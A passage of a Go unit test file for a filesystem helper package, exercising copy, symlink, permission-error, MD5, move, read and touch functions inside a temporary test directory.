assert.True(t, revokingMode(0577, 0477))
assert.True(t, revokingMode(0577, 0177))
}
func TestChown(t *testing.T) {
resetTest()
// invalid file globbing i.e. doesn't exist
{
err := Chown(path.Join(tmpDir, "bogus"), 50, 50)
assert.True(t, strings.HasPrefix(err.Error(), "failed to get any sources for"))
}
// No path given
{
err := Chown("", 50, 50)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
}
func TestCopyGlob(t *testing.T) {
// force Glob error
{
test.OneShotForceFilePathGlobError()
err := Copy(testfile, tmpfile)
assert.True(t, strings.HasPrefix(err.Error(), "failed to get glob for"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
}
// copying a single file to a non-existing dst copies to that path, not into it
{
resetTest()
// Create src dir and target file
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "newfile1"))
assert.Nil(t, err)
// Now copy using a glob pattern that matches the single file
err = Copy(path.Join(tmpDir, "*/newfile*"), path.Join(tmpDir, "dst"))
assert.Nil(t, err)
// Validate resulting paths
results, err := AllPaths(tmpDir)
assert.Nil(t, err)
tmpDirAbs, err := Abs(tmpDir)
for i := range results {
results[i] = strings.TrimPrefix(results[i], tmpDirAbs)
}
assert.Equal(t, []string{"", "/dst", "/src", "/src/newfile1"}, results)
// Validate resulting file data
data1, err := ReadString(path.Join(tmpDir, "src/newfile1"))
assert.Nil(t, err)
data2, err := ReadString(path.Join(tmpDir, "dst"))
assert.Equal(t, data1, data2)
}
// multiple files to non-existing dst
{
resetTest()
// Create src dir and target file
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "newfile1"))
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "newfile2"))
assert.Nil(t, err)
// Now copy using a glob pattern that matches both files
err = Copy(path.Join(tmpDir, "*/newfile*"), path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.FileExists(t, path.Join(tmpDir, "dst/newfile1"))
assert.FileExists(t, path.Join(tmpDir, "dst/newfile2"))
}
// multiple files to pre-existing directory
{
resetTest()
dst := path.Join(tmpDir)
err := Copy("./*", dst)
assert.Nil(t, err)
expected, err := AllPaths(".")
assert.Nil(t, err)
results, err := AllPaths(tmpDir)
assert.Nil(t, err)
for i := range results {
expected[i] = path.Base(expected[i])
results[i] = path.Base(results[i])
}
assert.Equal(t, "sys", expected[0])
assert.Equal(t, "temp", results[0])
assert.Equal(t, expected[1:], results[1:])
}
}
func TestCopyWithPermissionFailures(t *testing.T) {
// try to create destination dirs in no write destination
{
resetTest()
// Create src dir with no read permissions
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
_, err = Touch(path.Join(srcDir, "file"))
assert.Nil(t, err)
// Create dst dir with no write permissions
dstDir := path.Join(tmpDir, "dst")
_, err = MkdirP(dstDir)
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
// Now copy from src to sub dir under dst
err = Copy(srcDir, path.Join(dstDir, "sub/file"))
assert.True(t, strings.HasPrefix(err.Error(), "mkdir"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix the permission on the dstDir
assert.Nil(t, os.Chmod(dstDir, 0755))
}
// read from no read permission source failure
{
resetTest()
// Create src dir with no read permissions
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
assert.Nil(t, os.Chmod(srcDir, 0222))
// Now try to copy from src
err = Copy(srcDir, path.Join(tmpDir, "dst"))
assert.True(t, strings.HasPrefix(err.Error(), "failed to open directory"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix the permissions on the srcDir
assert.Nil(t, os.Chmod(srcDir, 0755))
}
}
func TestCopyDirLinksFailure(t *testing.T) {
resetTest()
// Create sub dir with link to it
srcDir := path.Join(tmpDir, "src")
_, err := MkdirP(srcDir)
assert.Nil(t, err)
linkDir := path.Join(tmpDir, "link")
assert.Nil(t, os.Symlink(srcDir, linkDir))
// Now create the destination with readonly permissions
dstDir := path.Join(tmpDir, "dst")
_, err = MkdirP(dstDir)
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
// Now try to copy the linkDir to the dstDir
err = Copy(linkDir, dstDir)
assert.True(t, strings.HasPrefix(err.Error(), "symlink"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix the permission on the dstDir
assert.Nil(t, os.Chmod(dstDir, 0755))
}
func TestCopyLinksRelativeNoFollow(t *testing.T) {
resetTest()
// temp/first/f0,f1
firstDir, _ := MkdirP(path.Join(tmpDir, "first"))
Touch(path.Join(firstDir, "f0"))
Touch(path.Join(firstDir, "f1"))
// temp/second/s0,s1
secondDir, _ := MkdirP(path.Join(tmpDir, "second"))
Touch(path.Join(secondDir, "s0"))
Touch(path.Join(secondDir, "s1"))
// Create symlink in first dir to second dir
// temp/first/second => temp/second
symlink := path.Join(tmpDir, "first", "second")
assert.Nil(t, os.Symlink("../second", symlink))
// Copy first dir to dst without following links
{
beforeInfo, err := Lstat(secondDir)
assert.Nil(t, err)
dstDir, _ := Abs(path.Join(tmpDir, "dst"))
assert.Nil(t, Copy(firstDir, dstDir))
// Compute results
results, _ := AllPaths(dstDir)
for i := 0; i < len(results); i++ {
results[i] = SlicePath(results[i], -2, -1)
}
// Check that second is still a link, same as it was originally
srcInfo, err := Lstat(path.Join(firstDir, "second"))
assert.Nil(t, err)
assert.True(t, srcInfo.IsSymlink())
dstInfo, err := Lstat(path.Join(dstDir, "second"))
assert.Nil(t, err)
assert.True(t, dstInfo.IsSymlink())
assert.Equal(t, srcInfo.Mode(), dstInfo.Mode())
srcTarget, _ := srcInfo.SymlinkTarget()
dstTarget, _ := dstInfo.SymlinkTarget()
assert.Equal(t, srcTarget, dstTarget)
assert.Equal(t, "../second", dstTarget)
// Compare expected to results
assert.Equal(t, []string{"temp/dst", "dst/f0", "dst/f1", "dst/second", "temp/second", "second/s0", "second/s1"}, results)
afterInfo, err := Lstat(secondDir)
assert.Nil(t, err)
assert.Equal(t, beforeInfo.Mode(), afterInfo.Mode())
}
}
func TestCopyLinksAbsNoFollow(t *testing.T) {
resetTest()
// temp/first/f0,f1
firstDir, _ := MkdirP(path.Join(tmpDir, "first"))
Touch(path.Join(firstDir, "f0"))
Touch(path.Join(firstDir, "f1"))
// temp/second/s0,s1
secondDir, _ := MkdirP(path.Join(tmpDir, "second"))
Touch(path.Join(secondDir, "s0"))
Touch(path.Join(secondDir, "s1"))
// Create symlink in first dir to second dir
// temp/first/second => temp/second
symlink := path.Join(tmpDir, "first", "second")
assert.Nil(t, os.Symlink(secondDir, symlink))
// Copy first dir to dst without following links
{
beforeInfo, err := Lstat(secondDir)
assert.Nil(t, err)
dstDir, _ := Abs(path.Join(tmpDir, "dst"))
assert.Nil(t, Copy(firstDir, dstDir))
// Compute results
results, _ := AllPaths(dstDir)
for i := 0; i < len(results); i++ {
results[i] = SlicePath(results[i], -2, -1)
}
// Check that second is still a link, same as it was originally
srcInfo, err := Lstat(path.Join(firstDir, "second"))
assert.Nil(t, err)
assert.True(t, srcInfo.IsSymlink())
dstInfo, err := Lstat(path.Join(dstDir, "second"))
assert.Nil(t, err)
assert.True(t, dstInfo.IsSymlink())
assert.Equal(t, srcInfo.Mode(), dstInfo.Mode())
srcTarget, _ := srcInfo.SymlinkTarget()
dstTarget, _ := dstInfo.SymlinkTarget()
assert.Equal(t, srcTarget, dstTarget)
assert.Equal(t, "test/temp/second", SlicePath(dstTarget, -3, -1))
// Compare expected to results
assert.Equal(t, []string{"temp/dst", "dst/f0", "dst/f1", "dst/second", "temp/second", "second/s0", "second/s1"}, results)
afterInfo, err := Lstat(secondDir)
assert.Nil(t, err)
assert.Equal(t, beforeInfo.Mode(), afterInfo.Mode())
}
}
func TestCopy(t *testing.T) {
// invalid files
{
// invalid dst
err := Copy("", "")
assert.Equal(t, "empty string is an invalid path", err.Error())
// invalid src
err = Copy("", "foo")
assert.Equal(t, "empty string is an invalid path", err.Error())
// invalid file globbing i.e. doesn't exist
err = Copy("foo", "bar")
assert.True(t, strings.HasPrefix(err.Error(), "failed to get any sources for"))
}
// test/temp/pkg does not exist so copy sys contents to pkg i.e. test/temp/pkg
{
resetTest()
src := "."
dst := path.Join(tmpDir, "pkg")
assert.Nil(t, Copy(src, dst))
srcPaths, err := AllPaths(src)
assert.Nil(t, err)
dstPaths, err := AllPaths(dst)
assert.Nil(t, err)
for i := range dstPaths {
srcPaths[i] = path.Base(srcPaths[i])
dstPaths[i] = path.Base(dstPaths[i])
}
assert.Equal(t, "sys", srcPaths[0])
assert.Equal(t, "pkg", dstPaths[0])
assert.Equal(t, srcPaths[1:], dstPaths[1:])
}
// test/temp/pkg does exist so copy sys dir into pkg i.e. test/temp/pkg/sys
{
resetTest()
src, err := Abs(".")
assert.Nil(t, err)
src += "/" // trailing slashes on an abs path seem to change behavior
dst, err := Abs(path.Join(tmpDir, "pkg"))
assert.Nil(t, err)
dst += "/" // trailing slashes on an abs path seem to change behavior
MkdirP(dst)
assert.Nil(t, Copy(src, dst))
srcPaths, err := AllPaths(src)
assert.Nil(t, err)
dstPaths, err := AllPaths(path.Join(dst, "sys"))
assert.Nil(t, err)
for i := range dstPaths {
srcPaths[i] = path.Base(srcPaths[i])
dstPaths[i] = path.Base(dstPaths[i])
}
assert.Equal(t, srcPaths, dstPaths)
}
}
func TestCopyLinkedDir(t *testing.T) {
// reset state
dir := filepath.Join(tmpDir, "LinkedDir")
RemoveAll(dir)
dir, err := MkdirP(dir)
assert.NoError(t, err)
// create a dir to test
dir1, err := MkdirP(filepath.Join(dir, "dir1"))
assert.NoError(t, err)
// create a link to test
link1 := filepath.Join(dir, "link1")
err = Symlink(dir1, link1)
assert.NoError(t, err)
// create test files
file1, err := Touch(filepath.Join(dir1, "file1"))
assert.NoError(t, err)
assert.FileExists(t, file1)
file2, err := Touch(filepath.Join(dir1, "file2"))
assert.NoError(t, err)
assert.FileExists(t, file2)
// Copy dir1 to dir2 via link1
dir2 := filepath.Join(dir, "dir2")
err = Copy(link1, dir2, FollowOpt(true))
assert.NoError(t, err)
results, err := AllPaths(dir2)
assert.NoError(t, err)
files := []string{}
for _, result := range results {
files = append(files, SlicePath(result, -3, -1))
}
assert.Equal(t, []string{"temp/LinkedDir/dir2", "LinkedDir/dir2/file1", "LinkedDir/dir2/file2"}, files)
}
func TestCopyLinkedDirNested(t *testing.T) {
// reset state
dir := filepath.Join(tmpDir, "LinkedDirNested")
RemoveAll(dir)
dir, err := MkdirP(dir)
assert.NoError(t, err)
// create dirs to test with
dir1, err := MkdirP(filepath.Join(dir, "dir1"))
assert.NoError(t, err)
dir2, err := MkdirP(filepath.Join(dir, "dir2"))
assert.NoError(t, err)
// create a link to test with
link1 := filepath.Join(dir1, "link1")
err = Symlink(dir2, link1)
assert.NoError(t, err)
// create test files
file1, err := Touch(filepath.Join(dir2, "file1"))
assert.NoError(t, err)
assert.FileExists(t, file1)
file2, err := Touch(filepath.Join(dir2, "file2"))
assert.NoError(t, err)
assert.FileExists(t, file2)
// Copy dir1 to dir2 via link1
dir3 := filepath.Join(dir, "dir3")
err = Copy(dir1, dir3, FollowOpt(true))
assert.NoError(t, err)
results, err := AllPaths(dir3)
assert.NoError(t, err)
files := []string{}
for _, result := range results {
files = append(files, SlicePath(result, -3, -1))
}
assert.Equal(t, []string{"temp/LinkedDirNested/dir3", "LinkedDirNested/dir3/link1", "dir3/link1/file1", "dir3/link1/file2"}, files)
}
func TestDarwin(t *testing.T) {
if runtime.GOOS == "darwin" {
assert.True(t, Darwin())
} else {
assert.False(t, Darwin())
}
}
func TestLinux(t *testing.T) {
if runtime.GOOS == "linux" {
assert.True(t, Linux())
} else {
assert.False(t, Linux())
}
}
func TestWindows(t *testing.T) {
if runtime.GOOS == "windows" {
assert.True(t, Windows())
} else {
assert.False(t, Windows())
}
}
func TestCopyWithFileParentDoentExist(t *testing.T) {
// test/temp/foo/bar/readme does not exist and neither does its parent,
// so foo/bar will be created first and README.md will be copied (cloned) to readme
resetTest()
src := "./README.md"
dst := path.Join(tmpDir, "foo/bar/readme")
assert.False(t, Exists(dst))
assert.Nil(t, Copy(src, dst))
assert.True(t, Exists(dst))
srcMD5, err := MD5(src)
assert.Nil(t, err)
dstMD5, err := MD5(dst)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
}
func TestCopyFileParentDoentExist(t *testing.T) {
// test/temp/foo/bar/readme does not exist and neither does its parent,
// so foo/bar will be created first and README.md will be copied (cloned) to readme
resetTest()
src := "./README.md"
dst := path.Join(tmpDir, "foo/bar/readme")
assert.False(t, Exists(dst))
_, err := CopyFile(src, dst)
assert.Nil(t, err)
assert.True(t, Exists(dst))
srcMD5, err := MD5(src)
assert.Nil(t, err)
dstMD5, err := MD5(dst)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
}
func TestCopyWithDirParentDoentExist(t *testing.T) {
// test/temp/foo/bar/pkg does not exist and neither does its parent,
// so foo/bar will be created first and the sys dir will be cloned to pkg
resetTest()
src := "."
dst := path.Join(tmpDir, "foo/bar/pkg")
assert.Nil(t, Copy(src, dst))
srcPaths, err := AllPaths(src)
assert.Nil(t, err)
dstPaths, err := AllPaths(dst)
assert.Nil(t, err)
for i := range dstPaths {
srcPaths[i] = path.Base(srcPaths[i])
dstPaths[i] = path.Base(dstPaths[i])
}
assert.Equal(t, "sys", srcPaths[0])
assert.Equal(t, "pkg", dstPaths[0])
assert.Equal(t, srcPaths[1:], dstPaths[1:])
}
func TestCopyFile(t *testing.T) {
resetTest()
// force chmod error only
{
test.OneShotForceOSChmodError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to chmod file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// force close error only
{
test.OneShotForceOSCloseError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// force sync error and close error
{
test.OneShotForceOSSyncError()
test.OneShotForceOSCloseError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed to sync data to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// force copy error and close error
{
test.OneShotForceIOCopyError()
test.OneShotForceOSCloseError()
result, err := CopyFile(testfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed to copy data to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, Remove(tmpfile))
}
// copy symlink to readonly dest - failure
{
// Create link to a bogus file
link := path.Join(tmpDir, "link")
err := Symlink(path.Join(tmpDir, "bogus"), link)
assert.Nil(t, err)
// Create dst dir with readonly permissions
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
err = os.Chmod(dstDir, 0444)
assert.Nil(t, err)
// Copy link to dst with readonly permissions and see failure
result, err := CopyFile(link, dstDir)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "symlink"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Reset permissions on the dst dir
err = os.Chmod(dstDir, 0755)
assert.Nil(t, err)
}
resetTest()
// CopyFile symlink
{
// Create link to a bogus file
link := path.Join(tmpDir, "link")
err := Symlink(path.Join(tmpDir, "bogus"), link)
assert.Nil(t, err)
newlink := path.Join(tmpDir, "newlink")
result, err := CopyFile(link, newlink)
assert.Equal(t, SlicePath(newlink, -2, -1), SlicePath(result, -2, -1))
assert.Nil(t, err)
// Validate files and link locations
linkInfo, err := Lstat(link)
assert.Nil(t, err)
assert.True(t, linkInfo.IsSymlink())
assert.False(t, linkInfo.SymlinkTargetExists())
linkTarget, err := linkInfo.SymlinkTarget()
assert.Nil(t, err)
assert.Equal(t, "../../test/temp/bogus", linkTarget)
newlinkInfo, err := Lstat(newlink)
assert.Nil(t, err)
assert.True(t, newlinkInfo.IsSymlink())
assert.False(t, newlinkInfo.SymlinkTargetExists())
assert.False(t, SymlinkTargetExists(newlink))
newlinkTarget, err := newlinkInfo.SymlinkTarget()
assert.Nil(t, err)
assert.Equal(t, "../../test/temp/bogus", newlinkTarget)
// Create bogus file and test that symlink target exists
_, err = Touch(path.Join(tmpDir, "bogus"))
assert.Nil(t, err)
assert.True(t, newlinkInfo.SymlinkTargetExists())
assert.True(t, SymlinkTargetExists(newlink))
}
resetTest()
// target file is not readable due to permissions
{
// Write out a temp file
err := WriteString(tmpfile, `This is a test of the emergency broadcast system.`)
assert.Nil(t, err)
// Revoke read permissions
assert.Nil(t, os.Chmod(tmpfile, 0222))
// Try to copy it and fail
result, err := CopyFile(tmpfile, path.Join(tmpDir, "new"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to open file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(tmpfile, 0644))
assert.Nil(t, Remove(tmpfile))
}
// source is a symlink to a directory rather than a file
{
// Setup link to bogus file
subDir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
linkDir := path.Join(tmpDir, "link")
assert.Nil(t, Symlink(subDir, linkDir))
result, err := CopyFile(linkDir, "new")
assert.Equal(t, "", result)
assert.Equal(t, "src target is not a regular file or a symlink to a file", err.Error())
}
resetTest()
// empty destination
{
result, err := CopyFile(readme, "")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// empty source
{
result, err := CopyFile("", "")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// source doesn't exist
{
result, err := CopyFile(path.Join(tmpDir, "foo"), path.Join(tmpDir, "bar"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to execute Lstat against"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// empty info path
{
result, err := CopyFile(path.Join(tmpDir, "foo/foo"), "", InfoOpt(&FileInfo{}))
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// pass in bad info
{
result, err := CopyFile(path.Join(tmpDir, "foo/foo"), "", InfoOpt(&FileInfo{Path: "foo/foo"}))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to execute Lstat against"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// source is a directory
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
result, err := CopyFile(subdir, path.Join(tmpDir, "bar"))
assert.Equal(t, "", result)
assert.Equal(t, "src target is not a regular file or a symlink to a file", err.Error())
}
// new destination name
{
result, err := CopyFile(readme, path.Join(tmpDir, "foo"))
assert.Nil(t, err)
assert.Equal(t, "temp/foo", SlicePath(result, -2, -1))
assert.Nil(t, Remove(result))
}
// failed to create destination sub directory
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
// Now make subdir readonly
assert.Nil(t, os.Chmod(subdir, 0555))
// Try to copy to a readonly directory
result, err := CopyFile(readme, path.Join(subdir, "foo/bar"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "mkdir"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix permissions on subdir and remove it
assert.Nil(t, os.Chmod(subdir, 0755))
assert.Nil(t, RemoveAll(subdir))
}
// failed to stat destination
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
// Now make subdir readonly
assert.Nil(t, os.Chmod(subdir, 0444))
// Try to copy to a readonly directory
result, err := CopyFile(readme, path.Join(subdir, "foo/bar"))
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to Stat destination"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix permissions on subdir and remove it
assert.Nil(t, os.Chmod(subdir, 0755))
assert.Nil(t, RemoveAll(subdir))
}
// failed to create new file due to permission denied
{
subdir, err := MkdirP(path.Join(tmpDir, "sub"))
assert.Nil(t, err)
// Now make subdir readonly
assert.Nil(t, os.Chmod(subdir, 0444))
// Try to copy to a readonly directory
result, err := CopyFile(readme, subdir)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to create file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix permissions on subdir and remove it
assert.Nil(t, os.Chmod(subdir, 0755))
assert.Nil(t, RemoveAll(subdir))
}
// happy
{
// Copy regular file
foo := path.Join(tmpDir, "foo")
assert.False(t, Exists(foo))
result, err := CopyFile(readme, foo)
assert.Nil(t, err)
assert.Equal(t, SlicePath(foo, -2, -1), SlicePath(result, -2, -1))
assert.True(t, Exists(foo))
srcMD5, err := MD5(readme)
assert.Nil(t, err)
dstMD5, err := MD5(foo)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
// Overwrite file
result, err = CopyFile(testfile, foo)
assert.Nil(t, err)
assert.Equal(t, SlicePath(foo, -2, -1), SlicePath(result, -2, -1))
srcMD5, err = MD5(testfile)
assert.Nil(t, err)
dstMD5, err = MD5(foo)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
}
}
func TestExists(t *testing.T) {
resetTest()
// now try a permissions denied check
{
sub, err := MkdirP(path.Join(tmpDir, "dir/sub"))
assert.Nil(t, err)
assert.True(t, Exists(sub))
file, err := Touch(path.Join(sub, "file"))
assert.Nil(t, err)
assert.Nil(t, Chmod(path.Dir(sub), 0444, RecurseOpt(true)))
assert.True(t, Exists(sub))
assert.True(t, Exists(file))
}
// basic check
{
assert.False(t, Exists("bob"))
assert.True(t, Exists(readme))
}
}
func TestMkdirP(t *testing.T) {
// happy
{
result, err := MkdirP(tmpDir)
assert.Nil(t, err)
assert.Equal(t, SlicePath(tmpDir, -2, -1), SlicePath(result, -2, -1))
assert.True(t, Exists(tmpDir))
assert.Nil(t, RemoveAll(result))
}
// permissions given
{
result, err := MkdirP(tmpDir, 0555)
assert.Nil(t, err)
assert.Equal(t, SlicePath(tmpDir, -2, -1), SlicePath(result, -2, -1))
assert.True(t, Exists(tmpDir))
mode := Mode(tmpDir)
assert.Equal(t, os.ModeDir|os.FileMode(0555), mode)
}
// Remove read permissions from the temp dir
{
assert.Nil(t, os.Chmod(tmpDir, 0222))
result, err := MkdirP(path.Join(tmpDir, "foo"))
assert.Equal(t, "temp/foo", SlicePath(result, -2, -1))
assert.True(t, strings.HasPrefix(err.Error(), "failed creating directories for"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(tmpDir, 0755))
}
// HOME not set
{
// unset HOME
home := os.Getenv("HOME")
os.Unsetenv("HOME")
assert.Equal(t, "", os.Getenv("HOME"))
defer os.Setenv("HOME", home)
result, err := MkdirP("~/")
assert.Equal(t, "failed to expand the given path ~/: failed to compute the user's home directory: $HOME is not defined", err.Error())
assert.Equal(t, "", result)
}
}
func TestMD5(t *testing.T) {
resetTest()
// force copy error
{
test.OneShotForceIOCopyError()
assert.Nil(t, WriteString(tmpfile, "test"))
result, err := MD5(tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed copying file data into hash from"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
}
// empty string
{
result, err := MD5("")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// doesn't exist
{
result, err := MD5("foo")
assert.Equal(t, "", result)
assert.Equal(t, "file does not exist", err.Error())
}
// happy
{
f, _ := os.Create(tmpfile)
defer f.Close()
f.WriteString(`This is a test of the emergency broadcast system.`)
expected := "067a8c38325b12159844261d16e5cb13"
result, err := MD5(tmpfile)
assert.Nil(t, err)
assert.Equal(t, expected, result)
}
// Remove read permissions from file
{
assert.Nil(t, os.Chmod(tmpfile, 0222))
result, err := MD5(tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed opening target file"))
assert.Nil(t, os.Chmod(tmpfile, 0644))
}
}
func TestMove(t *testing.T) {
resetTest()
// Copy file into tmpDir then rename it in the same location
assert.Nil(t, Copy(testfile, tmpDir))
newTestFile := path.Join(tmpDir, "testfile")
srcMd5, _ := MD5(newTestFile)
assert.True(t, Exists(newTestFile))
assert.False(t, Exists(tmpfile))
result, err := Move(newTestFile, tmpfile)
assert.Nil(t, err)
assert.Equal(t, tmpfile, result)
assert.True(t, Exists(tmpfile))
dstMd5, err := MD5(tmpfile)
assert.Nil(t, err)
assert.False(t, Exists(newTestFile))
assert.Equal(t, srcMd5, dstMd5)
// Now create a sub directory and move the file there
subDir := path.Join(tmpDir, "sub")
MkdirP(subDir)
newfile, err := Move(tmpfile, subDir)
assert.Nil(t, err)
assert.Equal(t, path.Join(subDir, path.Base(tmpfile)), newfile)
assert.False(t, Exists(tmpfile))
assert.True(t, Exists(newfile))
dstMd5, _ = MD5(newfile)
assert.Equal(t, srcMd5, dstMd5)
// permission denied
assert.Nil(t, os.Chmod(subDir, 0222))
result, err = Move(newfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed renaming file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(subDir, 0755))
}
func TestPwd(t *testing.T) {
assert.Equal(t, "sys", path.Base(Pwd()))
}
func TestReadBytes(t *testing.T) {
resetTest()
// empty string
{
data, err := ReadBytes("")
assert.Equal(t, ([]byte)(nil), data)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// invalid file
{
data, err := ReadBytes("foo")
assert.Equal(t, ([]byte)(nil), data)
assert.True(t, strings.HasPrefix(err.Error(), "failed reading the file"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// happy
{
// Write out test data
assert.Nil(t, WriteString(tmpfile, "this is a test"))
// Read the file back in and validate
data, err := ReadBytes(tmpfile)
assert.Nil(t, err)
assert.Equal(t, "this is a test", string(data))
}
}
func TestReadLines(t *testing.T) {
resetTest()
// empty string
{
data, err := ReadLines("")
assert.Equal(t, ([]string)(nil), data)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// invalid file
{
data, err := ReadLines("foo")
assert.Equal(t, ([]string)(nil), data)
assert.True(t, strings.HasPrefix(err.Error(), "failed reading the file"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// happy
{
lines, err := ReadLines(testfile)
assert.Nil(t, err)
assert.Equal(t, 18, len(lines))
}
}
func TestReadLinesP(t *testing.T) {
resetTest()
// empty string
{
data := ReadLinesP(strings.NewReader(""))
assert.Equal(t, ([]string)(nil), data)
}
// happy
{
data, err := ReadString(testfile)
assert.Nil(t, err)
lines := ReadLinesP(strings.NewReader(data))
assert.Equal(t, 18, len(lines))
}
}
func TestReadString(t *testing.T) {
resetTest()
// empty string
{
data, err := ReadString("")
assert.Equal(t, "", data)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// invalid file
{
data, err := ReadString("foo")
assert.Equal(t, "", data)
assert.True(t, strings.HasPrefix(err.Error(), "failed reading the file"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// happy
{
// Write out test data
assert.Nil(t, WriteString(tmpfile, "this is a test"))
// Read the file back in and validate
data, err := ReadString(tmpfile)
assert.Nil(t, err)
assert.Equal(t, "this is a test", data)
}
}
func TestRemove(t *testing.T) {
resetTest()
// Write out test data
assert.Nil(t, WriteString(tmpfile, "this is a test"))
assert.True(t, Exists(tmpfile))
// Now remove the file and validate
assert.Nil(t, Remove(tmpfile))
assert.False(t, Exists(tmpfile))
}
func TestSymlink(t *testing.T) {
resetTest()
_, err := Touch(tmpfile)
assert.Nil(t, err)
// Create file symlink
newfilelink := path.Join(tmpDir, "filelink")
assert.Nil(t, Symlink(tmpfile, newfilelink))
assert.True(t, IsSymlink(newfilelink))
assert.True(t, IsSymlinkFile(newfilelink))
assert.False(t, IsSymlinkDir(newfilelink))
// Create dir symlink
subdir := path.Join(tmpDir, "sub")
_, err = MkdirP(subdir)
assert.Nil(t, err)
newdirlink := path.Join(tmpDir, "sublink")
assert.Nil(t, Symlink(subdir, newdirlink))
assert.True(t, IsSymlink(newdirlink))
assert.False(t, IsSymlinkFile(newdirlink))
assert.True(t, IsSymlinkDir(newdirlink))
}
func TestTouch(t *testing.T) {
resetTest()
// Force failure of Close via monkey patch
{
test.OneShotForceOSCloseError()
_, err := Touch(tmpfile)
assert.Equal(t, fmt.Sprintf("failed closing file %s: invalid argument", tmpfile), err.Error())
// Clean up
err = Remove(tmpfile)
assert.Nil(t, err)
}
// empty string
{
result, err := Touch("")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// permission denied
{
// Create the tmpfile
result, err := Touch(tmpfile)
assert.Equal(t, SlicePath(tmpfile, -2, -1), SlicePath(result, -2, -1))
// Now try to truncate it after setting to readonly
assert.Nil(t, os.Chmod(tmpfile, 0444))
result, err = Touch(tmpfile)
assert.Equal(t, SlicePath(tmpfile, -2, -1), SlicePath(result, -2, -1))
assert.True(t, strings.HasPrefix(err.Error(), "failed creating/truncating file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(tmpfile, 0755))
assert.Nil(t, Remove(tmpfile))
}
// happy
{
// Doesn't exist so create
